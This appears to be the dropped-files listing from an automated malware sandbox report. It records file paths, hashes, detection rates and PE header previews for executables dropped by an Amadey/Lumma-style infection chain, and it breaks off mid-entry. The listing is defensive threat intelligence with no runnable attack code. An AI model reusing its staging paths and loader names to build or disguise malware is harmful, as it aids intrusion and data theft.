Preview:	MDMP..a..... .......L.xf........................d...........................T.......8...........T..........................`...........L...............................................................................eJ..............GenuineIntel............T.......@...J.xf.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF750.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8316
Entropy (8bit):	3.696544658363471
Encrypted:	false
SSDEEP:	192:R6l7wVeJTJ6Pr6YaH67pJgmf+JjO0prz89bz5sfdA6xm:R6lXJ96j6YS67gmf+JjOlzSf2
MD5:	570DA6EC2644FDCCA67257EE7AF14BF4
SHA1:	703839992B1A7C98D805603D95ED1926D7140B5D
SHA-256:	427D912491E6E9364531A5BD3B806D1E95E73F4104AB1B1911CCA2075202D12C
SHA-512:	90900C304D0555AD03C1F4222B726C6250E6982CFECCCC6BF0CA7FF4687D9E26D40544466FEC36C08ADA56745BB4E8DBB48D1D501FB5F6A21D7BF9EF7848907D
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.1.3.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF7FD.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4605
Entropy (8bit):	4.474212621294459
Encrypted:	false
SSDEEP:	48:cvIwWl8zsOJg77aI9+5WpW8VY7Ym8M4JyqDFlk+q8/uzqG8El4Bed:uIjfEI7gI7VjJ1k+jo4Bed
MD5:	D24627D319ECCC8736365B5317AF5983
SHA1:	3A2E75984C22E799B0B5EA134F6D67A5028F0439
SHA-256:	109E16FB54355DD1BF8954B126C8F7F00695526B32489A214FD27C0287953377
SHA-512:	A2FA89692B509144DD3298A235B544419EEDA99FF3E0633B034A8A2C5FC75318E292F94639D4972734B02BDFDDC7EB6F000A8BAB48F83CDA63DAEBBA639F160D
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="380953" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF8A7.tmp.csv

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	85644
Entropy (8bit):	3.0616226070130366
Encrypted:	false
SSDEEP:	1536:ytGsiQ7EuM7bJyRNf24w3i9eqmXle9VlmX2AtC6:ytGsiQ7EuM7bJyRNf24w3i9eqmXle9Vk
MD5:	11F501DA57E87FD6FE1E9B8E0625F4A5
SHA1:	D786955611FDBEEBA8223B59E040B05CE4856BEA
SHA-256:	F1C66045681F68180C0A81A6CB14EFC1B4EF0AFB320E610E83A40FD7E4F9C283
SHA-512:	EC0C27746655210DB2C8F58D83646E000E4AC3F4E67E2B335B953B64F16664435D6AAEFBE05F8B5D49AB9B12ADA18279CA9DB98F09DAA256F87D024277451648
Malicious:	false
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF9E0.tmp.txt

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.685108130755466
Encrypted:	false
SSDEEP:	96:TiZYWznlgXbgwY/Y1aWlHyYEZnBgtFiT3iIBwPhgwa32QMSpAIXm3:2ZDdwYqOBwja32QMSpXXm3
MD5:	F381EA20D37EF4A7F78DC6A024F6B004
SHA1:	2E740D0822E62F157586B515B811C1DE3D066C79
SHA-256:	A95EAD9905C511561AA73B9B1948711385DC3898642413B7DD44ACE6EFEE83E1
SHA-512:	ACAA14FD2F53C0D45570025E07BCC9B6DB8D5325ECA40E5F9CB0105D776683B4BFDF69950F197E71D59D4987562DA7931F8CC61DA651C3D80F902F3105C08CDC
Malicious:	false
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\wikombernizc\reakuqnanrkn.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000015001\FirstZ.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2665984
Entropy (8bit):	6.546705490640015
Encrypted:	false
SSDEEP:	49152:UjBP3/qGrdNJ8VZFhY++Yk/4aLq8wH7mm6qJsSRRjyl:aBPvfrAZF28k/RLbwH7mvcRRjy
MD5:	FFADA57F998ED6A72B6BA2F072D2690A
SHA1:	6857B5F0C40A1CDB0411EB34AA9FE5029BCDB84F
SHA-256:	677F393462E24FB6DBA1A47B39E674F485450F91DEEE6076CCBAD9FD5E05BD12
SHA-512:	1DE77F83A89935BB3FC3772D5190C3827D76A998785D451E2C0D11A0061CFD28F1B96ECCB41B012C76DDDA2021E3333A0A647489AE3C6DAC10CFB8302ABDF33F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 82%
Joe Sandbox View:	Filename: 0DHrPD3miS.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.Evo-gen.26431.15713.exe, Detection: malicious, Browse Filename: bUWKfj04aU.exe, Detection: malicious, Browse Filename: g8DU6moaZ0.exe, Detection: malicious, Browse Filename: latestroc.exe, Detection: malicious, Browse Filename: bomb.bin.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: n2vzgCmJ7K.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d.....e.........."...........(.....@..........@.............................0)...........`.....................................................<.....).......(.............. ).x...............................(.......8...........@...X............................text...V........................... ..`.rdata...".......$..................@..@.data.....'.......'.................@....pdata........(.......(.............@..@.00cfg........(.......(.............@..@.tls..........(.......(.............@....rsrc.........).......(.............@..@.reloc..x.... ).......(.............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Corporation.zip

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Zip archive data, at least v1.0 to extract, compression method=store
Category:	dropped
Size (bytes):	17056614
Entropy (8bit):	7.997738332950985
Encrypted:	true
SSDEEP:	393216:d0ns9BhTdp8NlfuFpaDJXLpn8nq7L6kfjtg:dZdp8jfuaD1Fn8nq7ukpg
MD5:	9CB5EDB138B8DF3492C0B14B56D617AC
SHA1:	B02DFAE970D31251D2F94CF14328F757CEB45C98
SHA-256:	DE8C63974461298010C9B9C8A97E769F72F271E976BDBB54DEE45264F8A0EDA8
SHA-512:	50306F663098471C9AA51D9024BCE4B8A25BAEC2FAB2424909B481A4D223FEDA5311111831EB9084115686782C0C831F81EF5CCDB32B7A6833FF811FF51D4929
Malicious:	true
Preview:	PK.........-.X................File/PK.........-.X.Vg............File/BASPRO.exe.\|.\|T....p.!3...u..\1..G....:.I.%....X....RE.....e8.....W.}.u...v.....?.&..(.T....mm.....1H..;.... ......^...s.w...\|..w..>.G(..A...C..../-\./....O..Bxj..W..4?.u[..[b.6..g.?....?..w../....3..;c.+Zc_.k...M."s.}..e...D..+B9.k........2.!..I,..f....6...C.D...[.%q......2...5..G..#~......\|......_.b..cS....S..v_.%..M.....B.W...n.... <..k....._[.B..1..N?H.....~.z.+...2aO.#..+...$\.o...D:.\.~.z.V.~.0.....p'&...m..y....B..y..^.u.a..y.L......I..osY)\..[6.Q..Xa....]9..=o.........<..~^.K............o.........^,......r..:!.......'..W..../ ......r.}W..N....mB..,..kJ.mv9v..7..8..J..-)?e.GcP>TR~..<V.>.yw9n..t...Qg.F.uEa....z.....'_.J.h.-~r.T........V......aI{.Z.=.....>sM..z?.....g....ukWc.9#..H........w.t=.........Jr....\...C........*&..&,If..K..R.K>.T..r.T.%.,%.Tf..X.%.K......~.0...f._8..#.@{q.......S@........m..NP'....(E"._._..."'.%=6K.'.....g.....J..`L^'...-.......dt.:.6...~.

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegAsm.exe.log

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1119
Entropy (8bit):	5.345080863654519
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0Hj
MD5:	88593431AEF401417595E7A00FE86E5F
SHA1:	1714B8F6F6DCAAB3F3853EDABA7687F16DD331F4
SHA-256:	ED5E60336FB00579E0867B9615CBD0C560BB667FE3CEE0674F690766579F1032
SHA-512:	1D442441F96E69D8A6D5FB7E8CF01F13AF88CA2C2D0960120151B15505DD1CADC607EF9983373BA8E422C65FADAB04A615968F335A875B5C075BB9A6D0F346C9
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ama.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000007001\ama.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	3094
Entropy (8bit):	5.33145931749415
Encrypted:	false
SSDEEP:	96:Pq5qHwCYqh3oPtI6eqzxP0aymTqdqlq7qqjqc85VD:Pq5qHwCYqh3qtI6eqzxP0atTqdqlq7qV
MD5:	2A56468A7C0F324A42EA599BF0511FAF
SHA1:	404B343A86EDEDF5B908D7359EB8AA957D1D4333
SHA-256:	6398E0BD46082BBC30008BC72A2BA092E0A1269052153D343AA40F935C59957C
SHA-512:	19B79181C40AA51C7ECEFCD4C9ED42D5BA19EA493AE99654D3A763EA9B21B1ABE5B5739AAC425E461609E1165BCEA749CFB997DE0D35303B4CF2A29BDEF30B17
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\FirstZ[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2665984
Entropy (8bit):	6.546705490640015
Encrypted:	false
SSDEEP:	49152:UjBP3/qGrdNJ8VZFhY++Yk/4aLq8wH7mm6qJsSRRjyl:aBPvfrAZF28k/RLbwH7mvcRRjy
MD5:	FFADA57F998ED6A72B6BA2F072D2690A
SHA1:	6857B5F0C40A1CDB0411EB34AA9FE5029BCDB84F
SHA-256:	677F393462E24FB6DBA1A47B39E674F485450F91DEEE6076CCBAD9FD5E05BD12
SHA-512:	1DE77F83A89935BB3FC3772D5190C3827D76A998785D451E2C0D11A0061CFD28F1B96ECCB41B012C76DDDA2021E3333A0A647489AE3C6DAC10CFB8302ABDF33F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 82%
Joe Sandbox View:	Filename: 0DHrPD3miS.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.Evo-gen.26431.15713.exe, Detection: malicious, Browse Filename: bUWKfj04aU.exe, Detection: malicious, Browse Filename: g8DU6moaZ0.exe, Detection: malicious, Browse Filename: latestroc.exe, Detection: malicious, Browse Filename: bomb.bin.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: n2vzgCmJ7K.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d.....e.........."...........(.....@..........@.............................0)...........`.....................................................<.....).......(.............. ).x...............................(.......8...........@...X............................text...V........................... ..`.rdata...".......$..................@..@.data.....'.......'.................@....pdata........(.......(.............@..@.00cfg........(.......(.............@..@.tls..........(.......(.............@....rsrc.........).......(.............@..@.reloc..x.... ).......(.............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\lummac2[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	317952
Entropy (8bit):	6.813361448161113
Encrypted:	false
SSDEEP:	6144:3lGhYe2gss2fHZq4uCDrgcKJCMBus902mdK/WI5O7KKKDi4G:3lGhYHh0CnYZSLP7KKKD1G
MD5:	6E3D83935C7A0810F75DFA9BADC3F199
SHA1:	9F7D7C0EA662BCDCA9B0CDA928DC339F06EF0730
SHA-256:	DC4F0A8E3D12C98EAC09A42BD976579CCC1851056D9DE447495E8BE7519760ED
SHA-512:	9F6B22BC9D0306A69D3C5BAB83C7603FA23925C12089F9608772602AB2C4C0908CDA2A3D9592FC0FAB4AAFF209EF41D3E2A931511CE9DFD027691E8DCE9AD9B9
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 92%
Joe Sandbox View:	Filename: mCTacyNuyM.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: setup.exe, Detection: malicious, Browse Filename: setup.exe, Detection: malicious, Browse Filename: 4TzzRzv0Hs.exe, Detection: malicious, Browse Filename: KmhrN2q5ZO.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....cf..........................................@.......................................@.....................................x............................0...Q...................................................................................text............................... ..`.rdata..7*.......,..................@..@.data....+..........................@....reloc...Q...0...R..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\taskweaker[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	6098432
Entropy (8bit):	6.56462814076081
Encrypted:	false
SSDEEP:	49152:IsLm1+6M1hSfHiiQsaaR6GRNxM2u8RpZAPN0E8hKfOFuyjh5EYR/xbsSrpMih44K:F8Gi57VpZqGFLEeZ8+F+5
MD5:	6C149B39619395A8BA117A4CAE95BA6F
SHA1:	3EF8BE98589745ECCE5522DD871E813F69A7B71B
SHA-256:	C43B64C78F6CCBA5CFB7DE13FC39D5CC43FAD9A9F5E78799B34100AB69E5E4E8
SHA-512:	866EDAE7858E7BFB82486E99B31550307DE81FA732A3075B6E2FF0ABCADE5331BE28BB14D894CDF5176DC907A45AAA1407B6D8C4295CC69B6D45516F319560A4
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 62%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................$.. ...]................@.............................`c.....z.]...`... .......................................`.N.....`.......`......Y...............b...............................Y.(...................\|.`.@............................text..... ....... .................`.``.data...0.....!....... .............@.`..rdata....3...&...3...%.............@.`@.pdata........Y.......Y.............@.0@.xdata..D.....Z......zZ.............@.0@.bss..........Z.......................`..edata..N.....`.......Z.............@.0@.idata........`.......Z.............@.0..CRT....p.....`.......Z.............@.@..tls..........`.......Z.............@.@..rsrc........`.......Z.............@.0..reloc........b......F\.............@.0B................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\1[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	176063
Entropy (8bit):	7.138227393400436
Encrypted:	false
SSDEEP:	3072:ZswtCW600rB9asH0JW3TGSg/+ranKc2y3EyBTftiACq2A9m1eiX2B:ZDCW0B99Hb37c2eBDtzJ2Gql
MD5:	AB5C9F3C83AE4388607D1F60C82A7C28
SHA1:	2937F70E6C61F5D1B6D7FF9840B12F04EDC407FB
SHA-256:	9BEDD9ECE0A30934A8FD51C1A18A0A127EF2383E2B4604954FCCA2F522AA3A21
SHA-512:	F63A70D2E456B8A8B1FC077828FB13E4659114A5B15EDC71A4ACE258D2A3490DEEC91CF34D8DE83C4093DBF8590EF042400EE7E92860AB0277644C220A1DB2A7
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........uV............................................................................Rich............PE..L......c.................$..........0/.......@....@..................................^..........................................P........<..........................T...............................P...@............@...............................text...@".......$.................. ..`.rdata...L...@...N...(..............@..@.data...$2...........v..............@....rsrc....<.......>...,..............@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\gold[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	535080
Entropy (8bit):	7.63039679990245
Encrypted:	false
SSDEEP:	12288:dJStzAr5BeoKKYOr0ukzbMpbV4CvhbDyUdt1c6SEw7ZBEO:dMz+coKkzk3MpbIMrcvHZBt
MD5:	70A578F7F58456E475FACD69469CF20A
SHA1:	83E147E7BA01FA074B2F046B65978F838F7B1E8E
SHA-256:	5C8D556E39269B22E63BA9C941FF306BB043BC35125BA08787617577231B381A
SHA-512:	707ED48B45978D26FAAF3544BF22912461503D6E4B1A077CBB7C3A8ABD2F1EB3FEC16B2786A79AE4DB2DFEC92F662ECE1998BC142706D2B482599FB6191563C0
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............T...T...T[..U...T[..U#..T[..U...TJi.U...T[..U...T...T...TJi.U...TJi.U...T{j.U...T{j2T...T{j.U...TRich...T........................PE..L.....df...............'.Z..................p....@..........................P............@.................................d...<.......................(&... ..("..x...................................@............p..t............................text....Y.......Z.................. ..`.rdata.......p.......^..............@..@.data........0......................@....rsrc...............................@..@.reloc..("... ...$..................@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\legs[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	675368
Entropy (8bit):	7.728756552653038
Encrypted:	false
SSDEEP:	12288:rmdCEK6q454tcoonkKejC5Np01vwas4r/+IS71To3hg1aJEO:rDEQRtyb5Np0Rw/0+IS7G1t
MD5:	BBD06263062B2C536B5CAACDD5F81B76
SHA1:	C38352C1C08FB0FA5E67A079998EF30EBC962089
SHA-256:	1875275DA8D576FD9962C5B2BD9FE0E4B4D188CAAD9549125C8A64ECAF9308C9
SHA-512:	7FAA4E18CC9D7D82CB8EFE8494668E05F75DDD5A8C9C9A058B2246A786A60D7761168862220B70820B02F38F196CFB5F106DB36CDCFD5A5A3F9DFD01654EB9AD
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........\.j...j...j..R....j..R.../j..R....j..C...j..R....j...j...j..C...j..C...j..r...j..r.c..j..r...j..Rich.j..........PE..L....\pf...............'.~........................@..........................p............@.................................TE..(....0...............(..(&...@..x"......................................@...............h............................text....\|.......~.................. ..`.rdata..............................@..@.data...D....P.......@..............@....rsrc........0......................@..@.reloc..x"...@...$..................@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\NewLatest[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	424960
Entropy (8bit):	6.516408105291076
Encrypted:	false
SSDEEP:	12288:5fSPtGpmLb84Jjzo6yrBuKuJ+ITOC0Ud:UtGpmf8edykhV0Ud
MD5:	07101CAC5B9477BA636CD8CA7B9932CB
SHA1:	59EA7FD9AE6DED8C1B7240A4BF9399B4EB3849F1
SHA-256:	488385CD54D14790B03FA7C7DC997EBEA3F7B2A8499E5927EB437A3791102A77
SHA-512:	02240FF51A74966BC31CFCC901105096EB871F588EFAA9BE1A829B4EE6F245BD9DCA37BE7E2946BA6315FEEA75C3DCE5F490847250E62081445CD25B0F406887
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\NewLatest[1].exe, Author: Joe Security
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 96%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L...).nf..........................................@.......................................@.................................,....................................K......8...................l..........@............................................text............................... ..`.rdata..:...........................@..@.data....e... ...4..................@....rsrc...............................@..@.reloc...K.......L...0..............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Installer[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
